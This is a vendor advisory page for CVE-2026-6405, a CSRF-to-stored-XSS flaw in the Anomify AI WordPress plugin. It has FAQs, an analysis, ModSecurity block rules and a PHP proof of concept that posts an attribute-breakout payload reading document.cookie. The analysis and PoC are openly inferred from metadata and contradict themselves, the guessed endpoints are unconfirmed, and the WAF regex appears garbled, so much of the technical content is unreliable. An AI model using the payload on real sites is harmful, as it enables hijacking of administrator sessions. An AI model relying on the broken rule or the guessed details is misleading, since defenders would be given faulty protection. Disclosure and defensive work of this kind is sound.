What is CVE-2026-6405?

CVE-2026-6405 is a Cross-Site Request Forgery (CSRF) vulnerability in the Anomify AI plugin for WordPress, affecting versions up to and including 0.3.6. It leads to Stored Cross-Site Scripting (XSS) due to missing nonce verification and insufficient output escaping.

How does CVE-2026-6405 work?

The vulnerability allows an unauthenticated attacker to trick a logged-in administrator into submitting a forged request that modifies plugin settings. This can lead to the injection of arbitrary scripts into the API key field, which are stored in the database and executed in the administrator’s browser when the settings page is visited.

Who is affected by this vulnerability?

WordPress administrators using the Anomify AI plugin version 0.3.6 or earlier are affected. To check if you are vulnerable, verify your plugin version in the WordPress admin dashboard under the plugins section.

What are the practical implications of the CVSS score?

The CVSS score of 4.3 indicates a medium severity vulnerability that requires user interaction for exploitation. While it does not directly compromise confidentiality, it can lead to integrity issues, allowing attackers to execute scripts in the context of an administrator.

What steps should I take to remediate this vulnerability?

To remediate CVE-2026-6405, you should remove the vulnerable plugin or implement a Web Application Firewall (WAF) virtual patch. Additionally, if a patched version becomes available, update to that version to ensure nonce verification and proper output escaping are implemented.

What is Cross-Site Request Forgery (CSRF)?

Cross-Site Request Forgery (CSRF) is an attack that tricks a user into executing unwanted actions on a web application in which they are authenticated. It exploits the trust that a site has in a user’s browser.

What is Stored Cross-Site Scripting (XSS)?

Stored Cross-Site Scripting (XSS) occurs when an attacker is able to inject malicious scripts into content that is stored on the server. This script runs in the browser of any user who accesses the affected content, potentially leading to data theft or session hijacking.

How can I check if my site has been compromised?

To check if your site has been compromised, review the plugin settings for any unexpected changes, especially in the API key field. Additionally, monitor your site’s behavior for any unauthorized actions or scripts executing in the admin interface.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can create a malicious page that submits a POST request to the vulnerable plugin’s settings handler. It shows how the payload can exploit the lack of nonce verification and insufficient output escaping to execute arbitrary scripts.

What are the best practices to prevent such vulnerabilities?

Best practices include regularly updating plugins and themes, implementing nonce verification for forms, using proper output escaping functions, and conducting security audits on your WordPress site. Additionally, consider using security plugins that monitor for vulnerabilities.

What should I do if I cannot remove the plugin immediately?

If you cannot remove the plugin immediately, consider implementing a WAF to block malicious requests targeting the vulnerability. Additionally, educate your administrators about the risks and advise them to avoid visiting the plugin settings page until a fix is applied.

Where can I find more information about CVE-2026-6405?

More information about CVE-2026-6405 can be found in the official CVE database, security advisories from WordPress, and security research publications. Keeping abreast of updates from the plugin developer is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 19, 2026

CVE-2026-6405: Anomify AI <= 0.3.6 – Cross-Site Request Forgery (anomify)

CVE ID CVE-2026-6405

Plugin anomify

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 0.3.6

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6405 (metadata-based):

This vulnerability affects the Anomify AI plugin for WordPress (versions up to 0.3.6). It combines a Cross-Site Request Forgery (CSRF) issue with a stored Cross-Site Scripting (XSS) flaw. An unauthenticated attacker can trick a logged-in administrator into performing a forged request that modifies plugin settings. The attacker injects arbitrary web scripts into the plugin’s API key field. These scripts execute in the administrator’s browser whenever the settings page is visited. The CVSS score of 4.3 reflects the need for user interaction and the limited scope of impact (confidentiality not affected, integrity partially affected).

Root Cause:

The root cause is twofold, inferred from the CWE (352) and the description. First, the settings page handler lacks nonce verification. The form does not include a wp_nonce_field() call, and the handler does not call check_admin_referer(). This allows any cross-origin POST request to modify plugin settings without authentication or authorization. Second, the API key field undergoes sanitize_text_field(), which removes HTML tags but does not encode double-quote characters. The value is then echoed directly into an HTML attribute without esc_attr(), creating a stored XSS vector. Sanitize_text_field() strips angle brackets () but preserves double-quote characters. When the value is placed inside an HTML attribute like , a double-quote can break out of the attribute and inject an event handler. These conclusions are inferred from the CWE classification and the description. Atomic Edge research cannot confirm the exact file names or code paths without source code, but the described pattern is a classic CSRF-to-stored-XSS chain in WordPress plugins.

Exploitation:

An attacker crafts a malicious HTML page that submits a POST request to the vulnerable plugin’s settings handler. The likely endpoint is /wp-admin/options-general.php?page=anomify or a similar admin page. The attacker includes a payload such as foobar onclick=alert(1) in the API key parameter. Since sanitize_text_field() allows double-quotes, this value is stored as-is. When the administrator later visits the settings page, the payload breaks out of the input field’s value attribute and executes the attacker’s script. The attacker does not need authentication because CSRF bypasses the need for a valid nonce. The only requirement is that the administrator must be logged in at the time of the attack. Social engineering (such as a link or embedded image) tricks the administrator into visiting the attacker’s page. Atomic Edge analysis confirms that no nonce check, no capability check, and no output escaping on the stored value all contribute to the exploit.

Remediation:

The fix must address both the CSRF and the XSS. First, the plugin must add a nonce to the settings form using wp_nonce_field() and verify it in the handler with check_admin_referer(). This prevents forged requests. Second, when outputting the API key value into HTML attributes, the plugin must use esc_attr() to properly encode double-quotes and other special characters. Third, sanitize_text_field() is insufficient for attribute context. The plugin should use a more restrictive sanitization function such as sanitize_key() or apply additional checks. If the API key must contain special characters, the plugin should validate it against expected formats (e.g., alphanumeric with hyphens) before storage. Alternatively, storing the key in a setting that does not directly echo into an attribute attribute can mitigate the XSS. WordPress core functions like esc_attr() and wp_kses() are recommended. Since no patched version exists, users must remove the plugin or implement a WAF virtual patch.

Impact:

Successful exploitation allows an attacker to inject arbitrary JavaScript into the WordPress admin dashboard. This script executes in the context of the logged-in administrator. The attacker can then perform any action the administrator can: create new administrator accounts, install malicious plugins, modify site content, exfiltrate database contents, or redirect visitors to phishing pages. The stored XSS persists until an administrator removes the malicious value from the settings. Since the payload is stored in the database, every visit to the plugin settings page triggers the script. This can lead to full site compromise. The impact is limited by the requirement for user interaction (the administrator must visit the attacker’s page while logged in). Once triggered, however, the consequences can be severe, including privilege escalation and data theft.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6405 (metadata-based)
# Blocks CSRF-based XSS injection targeting Anomify AI plugin settings.
# Matches POST requests to options.php with suspicious double-quote patterns in the API key parameter.
# The rule focuses on the attribute-escape breakout pattern typical of this vulnerability.

SecRule REQUEST_URI "@streq /wp-admin/options.php" 
  "id:20264050,phase:2,deny,status:403,chain,msg:'CVE-2026-6405 - Anomify AI CSRF leading to Stored XSS',severity:'CRITICAL',tag:'CVE-2026-6405',tag:'wordpress',tag:'anomify'"
  SecRule ARGS_POST:anomify_api_key "@rx [^a-zA-Z0-9]" 
    "chain"
    SecRule ARGS_POST:anomify_api_key "@rx (?:onw+=|document.|javascript:|&#)" 
      "t:none,t:urlDecode"

# Alternative rule targeting custom AJAX handler (if plugin bypasses standard Settings API)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20264051,phase:2,deny,status:403,chain,msg:'CVE-2026-6405 - Anomify AI AJAX handler CSRF',severity:'CRITICAL',tag:'CVE-2026-6405',tag:'wordpress',tag:'anomify'"
  SecRule ARGS_POST:action "@streq anomify_save_settings" 
    "chain"
    SecRule ARGS_POST:anomify_api_key "@rx [^a-zA-Z0-9]" 
      "chain"
      SecRule ARGS_POST:anomify_api_key "@rx (?:onw+=|document.|javascript:|&#)" 
        "t:none,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6405 - Anomify AI <= 0.3.6 - Cross-Site Request Forgery leading to Stored XSS

/**
 * This Proof of Concept demonstrates a CSRF attack that exploits missing nonce
 * verification and insufficient output escaping in the Anomify AI plugin.
 * The payload injects a double-quote attribute escape to introduce an XSS vector.
 * 
 * Assumptions:
 * - The vulnerable settings page is accessible via /wp-admin/options-general.php?page=anomify
 * - The setting name for the API key is 'anomify_api_key' (inferred from plugin conventions)
 * - The form action likely submits to /wp-admin/options.php (WordPress settings API) or directly to an admin-ajax.php handler
 * - We target the standard options.php endpoint since the plugin likely uses the Settings API
 * - The XSS payload uses a double-quote to break out of the value attribute
 * - This PoC simulates a forgery page; the real attack would be delivered via HTML email or embedded on a third-party site
 * 
 * Usage: php poc.php http://target-wordpress-site.com
 */

if ($argc < 2) {
    die("Usage: php poc.php <target_url>n");
}

$target_url = rtrim($argv[1], '/');

// XSS payload that survives sanitize_text_field() and bypasses esc_attr()
// double-quote breaks out of the value attribute, then injects an event handler
$xss_payload = 'test" onclick=alert(document.cookie)//';

// The settings API endpoint for WordPress admin pages
$options_url = $target_url . '/wp-admin/options.php';

// Simulate a forged POST request that would be submitted from an attacker-controlled page
// The option name 'anomify_api_key' is inferred; adjust if actual option name differs
$post_data = array(
    'option_page' => 'anomify',
    'action' => 'update',
    '_wp_http_referer' => '/wp-admin/options-general.php?page=anomify',
    'anomify_api_key' => $xss_payload,
    // Some plugins use a checkbox 'submit' or hidden field
    'submit' => 'Save Changes'
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $options_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Important: This request will fail because there is no valid nonce.
// However, the vulnerability is that the WordPress Settings API normally requires a nonce.
// If the plugin bypasses the Settings API and uses custom processing, the CSRF may succeed.
// This PoC demonstrates the request structure; actual exploitation requires the admin to be logged in.

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] Request sent successfully. HTTP 200.n";
    echo "[+] If the admin was tricked into submitting this while logged in, the XSS payload was stored.n";
    echo "[+] The payload: $xss_payloadn";
} else {
    echo "[-] Request failed with HTTP $http_code (expected if nonce check is present).n";
    echo "[-] The CSRF vulnerability may require a different endpoint.n";
    echo "[-] Alternative endpoint guess: /wp-admin/admin-ajax.php with action 'anomify_save_settings'n";
}

echo "n--- Alternative AJAX-based PoC ---n";
echo "If the plugin uses a custom AJAX handler, try:n";
echo "POST /wp-admin/admin-ajax.phpn";
echo "action=anomify_save_settings&anomify_api_key=test%22+onclick%3Dalert(1)//n";

Frequently Asked Questions

What is CVE-2026-6405?
Overview of the vulnerability
CVE-2026-6405 is a Cross-Site Request Forgery (CSRF) vulnerability in the Anomify AI plugin for WordPress, affecting versions up to and including 0.3.6. It leads to Stored Cross-Site Scripting (XSS) due to missing nonce verification and insufficient output escaping.
How does CVE-2026-6405 work?
Mechanism of exploitation
The vulnerability allows an unauthenticated attacker to trick a logged-in administrator into submitting a forged request that modifies plugin settings. This can lead to the injection of arbitrary scripts into the API key field, which are stored in the database and executed in the administrator’s browser when the settings page is visited.
Who is affected by this vulnerability?
Identifying vulnerable users
WordPress administrators using the Anomify AI plugin version 0.3.6 or earlier are affected. To check if you are vulnerable, verify your plugin version in the WordPress admin dashboard under the plugins section.
What are the practical implications of the CVSS score?
Understanding the severity rating
The CVSS score of 4.3 indicates a medium severity vulnerability that requires user interaction for exploitation. While it does not directly compromise confidentiality, it can lead to integrity issues, allowing attackers to execute scripts in the context of an administrator.
What steps should I take to remediate this vulnerability?
Fixing the issue
To remediate CVE-2026-6405, you should remove the vulnerable plugin or implement a Web Application Firewall (WAF) virtual patch. Additionally, if a patched version becomes available, update to that version to ensure nonce verification and proper output escaping are implemented.
What is Cross-Site Request Forgery (CSRF)?
Defining CSRF
Cross-Site Request Forgery (CSRF) is an attack that tricks a user into executing unwanted actions on a web application in which they are authenticated. It exploits the trust that a site has in a user’s browser.
What is Stored Cross-Site Scripting (XSS)?
Defining Stored XSS
Stored Cross-Site Scripting (XSS) occurs when an attacker is able to inject malicious scripts into content that is stored on the server. This script runs in the browser of any user who accesses the affected content, potentially leading to data theft or session hijacking.
How can I check if my site has been compromised?
Identifying potential exploitation
To check if your site has been compromised, review the plugin settings for any unexpected changes, especially in the API key field. Additionally, monitor your site’s behavior for any unauthorized actions or scripts executing in the admin interface.
What does the proof of concept demonstrate?
Understanding the attack method
The proof of concept illustrates how an attacker can create a malicious page that submits a POST request to the vulnerable plugin’s settings handler. It shows how the payload can exploit the lack of nonce verification and insufficient output escaping to execute arbitrary scripts.
What are the best practices to prevent such vulnerabilities?
Enhancing security measures
Best practices include regularly updating plugins and themes, implementing nonce verification for forms, using proper output escaping functions, and conducting security audits on your WordPress site. Additionally, consider using security plugins that monitor for vulnerabilities.
What should I do if I cannot remove the plugin immediately?
Temporary mitigation strategies
If you cannot remove the plugin immediately, consider implementing a WAF to block malicious requests targeting the vulnerability. Additionally, educate your administrators about the risks and advise them to avoid visiting the plugin settings page until a fix is applied.
Where can I find more information about CVE-2026-6405?
Resources for further reading
More information about CVE-2026-6405 can be found in the official CVE database, security advisories from WordPress, and security research publications. Keeping abreast of updates from the plugin developer is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations